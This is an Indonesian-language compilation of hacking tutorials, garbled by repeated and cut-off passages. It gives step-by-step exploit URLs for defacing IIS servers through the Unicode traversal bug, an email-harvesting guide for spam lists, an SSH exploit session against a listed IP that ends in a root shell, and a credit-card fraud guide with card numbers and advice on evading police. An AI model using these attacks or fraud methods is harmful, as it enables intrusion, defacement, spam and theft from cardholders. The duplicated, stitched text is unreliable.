D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :
~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------
Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.
OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...
Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).
Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex
Cara Mendapatkan Puluhan Ribu Email
A. Gunakan software Mailcrawl (notworksolution.com) Versi gratisnya bisa menyimpan 3.000 email sekali pencarian, bisa diakali sampai bisa menyimpan 15.000 email/keyword.
Cara menggunakan :
1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia
(keluarga, uang, wanita, sukses, pertanian, militer)
2. Option :
a. thread pilih 60-80
b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)
abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe
majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster
admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing
customercare customerservice cs feedback komentar manager namaanda name username yourname
support technical service cs prohosting zzz info support technical request join berhenti
anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,
lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder
penyimpanan gabungan keyword
g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas
akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,
keyword2 dst.
3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda.
Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa
merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file
Cara menggunakan :
1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia
(keluarga, uang, wanita, sukses, pertanian, militer)
2. Option :
a. thread pilih 60-80
b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)
abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe
majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster
admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing
customercare customerservice cs feedback komentar manager namaanda name username yourname
support technical service cs prohosting zzz info support technical request join berhenti
anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,
lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder
penyimpanan gabungan keyword
g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas
akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,
keyword2 dst.
3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda.
Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa
merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file
Root Attack
lebih lanjut...
1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.
3. cara penggunaan grabbb :
a. ketik ./grabbb maka akan ada help nya
b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini
terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080
- klo kita scan port 21 maka akan keliatan versi wuftpd
- klo kita scan port 22 maka akan keliatan versi ssh
- klo kita scan port 443 maka akan keliatan versi openssl
berikut contoh ssh:
66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2
66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2
66.1.213.59:22: SSH-1.5-1.2.27
66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2
66.1.217.77:22: SSH-1.5-1.2.25
setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya
4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa
sebagai contoh pemakaian saya pake x3.tar.gz
5. ./x3 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Targets:
( 1) Small - SSH-1.5-1.2.26
( 2) Small - SSH-1.5-OpenSSH-1.2.3
( 3) Small - SSH-1.5-1.2.31
( 4) Small - SSH-1.5-1.3.07
( 5) Small - SSH-1.99-OpenSSH_2.1.1
( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH
( 7) Small - SSH-1.5-1.2.27
( 8) Small - SSH-1.99-OpenSSH_2.2.0p1
( 9) Big - SSH-1.99-OpenSSH_2.2.0p1
(10) Big - SSH-1.5-1.2.27
(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST
(12) Big - SSH-1.5-1.2.27
6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu
66.1.213.59:22: SSH-1.5-1.2.27
7. kita coba ./x3 -t 7 66.1.213.59 22 .
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Target: Small - SSH-1.99-OpenSSH_2.2.0p1
Attacking: 66.1.213.59:22
Testing if remote sshd is vulnerable # ATTACH NOW
YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080c5324 # SEGV #
(18) Trying: 0x080c6324 # SEGV #
(19) Trying: 0x080c7324 # SEGV #
(20) Trying: 0x080c8324 # SEGV #
(21) Trying: 0x0810e324 # SURVIVED #
(22 Trying: 0x08088634 # OK #
Finding distance till stack buffer
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
********* YOU ARE IN *********
uname -a ; id
uname -a ; id
Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown
uid=48(root) gid=48(root) groups=48(root)
nah itu uah dapat, terserah mau diapakan
keterangan:
ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.
tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain
1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.
3. cara penggunaan grabbb :
a. ketik ./grabbb maka akan ada help nya
b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini
terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080
- klo kita scan port 21 maka akan keliatan versi wuftpd
- klo kita scan port 22 maka akan keliatan versi ssh
- klo kita scan port 443 maka akan keliatan versi openssl
berikut contoh ssh:
66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2
66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2
66.1.213.59:22: SSH-1.5-1.2.27
66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2
66.1.217.77:22: SSH-1.5-1.2.25
setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya
4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa
sebagai contoh pemakaian saya pake x3.tar.gz
5. ./x3 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Targets:
( 1) Small - SSH-1.5-1.2.26
( 2) Small - SSH-1.5-OpenSSH-1.2.3
( 3) Small - SSH-1.5-1.2.31
( 4) Small - SSH-1.5-1.3.07
( 5) Small - SSH-1.99-OpenSSH_2.1.1
( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH
( 7) Small - SSH-1.5-1.2.27
( 8) Small - SSH-1.99-OpenSSH_2.2.0p1
( 9) Big - SSH-1.99-OpenSSH_2.2.0p1
(10) Big - SSH-1.5-1.2.27
(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST
(12) Big - SSH-1.5-1.2.27
6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu
66.1.213.59:22: SSH-1.5-1.2.27
7. kita coba ./x3 -t 7 66.1.213.59 22 .
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Target: Small - SSH-1.99-OpenSSH_2.2.0p1
Attacking: 66.1.213.59:22
Testing if remote sshd is vulnerable # ATTACH NOW
YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080c5324 # SEGV #
(18) Trying: 0x080c6324 # SEGV #
(19) Trying: 0x080c7324 # SEGV #
(20) Trying: 0x080c8324 # SEGV #
(21) Trying: 0x0810e324 # SURVIVED #
(22 Trying: 0x08088634 # OK #
Finding distance till stack buffer
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
********* YOU ARE IN *********
uname -a ; id
uname -a ; id
Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown
uid=48(root) gid=48(root) groups=48(root)
nah itu uah dapat, terserah mau diapakan
keterangan:
ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.
tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain
Senjata Seorang Carder
Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.
Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.
Mari kita mulai......
1.masuk ke MIRC
dari MIRC kalian join ke channel ini :
#CCPOSTS
#THACC (Dulu namanya #thecc)
sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!
2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.
3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.
4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)
5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.
6.!order.log
untuk mengetahui nama,alamat dan cc number seseorang.
ini nih cuplikannya :
#ccposts
*** Now talking in #ccposts
*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'
*** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands
*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , < 5437000105070603 > is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc
-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )
* DaLinuX i have root i need cc msg me for trade
!chk 373216942923005 0802
#thacc
*** Now talking in #thacc
*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'
*** Set by GSD on Fri May 03 02:11:11
!proxy
*** Parts: fc4 (~umik_o@203.147.50.12)
*** Joins: fc4 (~umik_o@203.147.50.12)
<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
*** e_KiNGHT-[Away] is now known as Guest53360
How I can see my card is valid
* DaLinuX i have root i need cc msg me for trade
Jelas ??!
Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak
Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.
Mari kita mulai......
1.masuk ke MIRC
dari MIRC kalian join ke channel ini :
#CCPOSTS
#THACC (Dulu namanya #thecc)
sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!
2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.
3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.
4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)
5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.
6.!order.log
untuk mengetahui nama,alamat dan cc number seseorang.
ini nih cuplikannya :
#ccposts
*** Now talking in #ccposts
*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'
*** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands
*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , < 5437000105070603 > is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc
